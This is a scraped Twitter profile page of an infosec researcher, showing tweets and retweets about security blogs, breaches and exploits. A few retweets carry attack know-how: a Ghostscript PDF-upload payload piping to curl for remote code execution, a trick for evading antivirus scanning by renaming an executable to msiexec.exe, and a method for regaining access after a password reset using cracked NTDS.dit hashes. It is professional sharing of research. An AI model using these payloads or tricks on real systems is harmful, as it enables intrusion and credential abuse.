Prashant Kumar

@notsoshant

Infosec guy. OSCE. OSCP. Ex Microsoft MVP in Consumer Security. Mostly retweeting stuff that I find interesting.

India
Vrijeme pridruživanja: ožujak 2010.

Tweetovi

Blokirali ste korisnika/cu @notsoshant

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @notsoshant

  1. Prikvačeni tweet
    30. sij

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

    Poništi
  2. proslijedio/la je Tweet

    New: Indian airline SpiceJet confirms breach of 1.2 million passenger details

    Poništi
  3. 28. sij

    I just published Extracting Source Code from Pre-Compiled applications. I'm writing after a long time, that too on a different topic that I used to write about. Hope this short blog will help someone somewhere. :)

    Poništi
  4. proslijedio/la je Tweet
    8. sij
    Poništi
  5. proslijedio/la je Tweet
    4. sij
    Poništi
  6. proslijedio/la je Tweet
    11. pro 2019.

    Dumped NTDS.dit. Had everyone’s hash. Cracked majority of them and had their clear text password. Target forced password reset on all users. I took passwords that ended in a number, added 1 to that number, and gained access to that environment again.

    Poništi
  7. proslijedio/la je Tweet
    9. pro 2019.
    Poništi
  8. 6. pro 2019.
    Poništi
  9. 3. pro 2019.
    Prikaži ovu nit
    Poništi
  10. 3. pro 2019.

    Sheer curiosity and willingness to share knowledge can sometimes have unpredictable surprises! This one is epic! 😆

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    30. stu 2019.

    Part 2 of blog series is out. Account Takeover via Forgot Password — A Practical Attack Scenario of Host Header Injection and more findings

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    28. stu 2019.
    Poništi
  13. Poništi
  14. proslijedio/la je Tweet
    27. stu 2019.

    Apple: Sorry we’ve killed off all applications older than 3 years old. Microsoft:

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    27. stu 2019.

    Compromise of Xiaomi Mi6 over WiFi to achieve RCE Bug chaining: 1⃣ MITM 2⃣ JavaScript Bridge (downloadAndInstallApk()) 3⃣ Contact Provider vulnerability (auto-start APK) 4⃣ RCE via

    Poništi
  16. proslijedio/la je Tweet
    13. stu 2019.

    It is worse than I’ve thought initially! 🤦‍♂️ If you simply rename your malicious .exe file to msiexec.exe its files will be excluded from realtime scanning. REALLY ? Simple C# dropper and the eicar-based PoC instruction:

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    7. stu 2019.

    RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl ) ) .putdeviceparams quit

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet

    I have always been interested in galactic archaeology, but I don't think this is what they meant. Did you know that dinosaurs lived on the other side of the Galaxy?

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    5. stu 2019.

    Macro you can pop all the UI you want but you can’t touch my filez. You are in a VM yo

    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet

    This is a great feature coming to Office and Windows 10. Opens documents from the internet (eg email) in Hyper-V virtual machine, transparent to user.

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·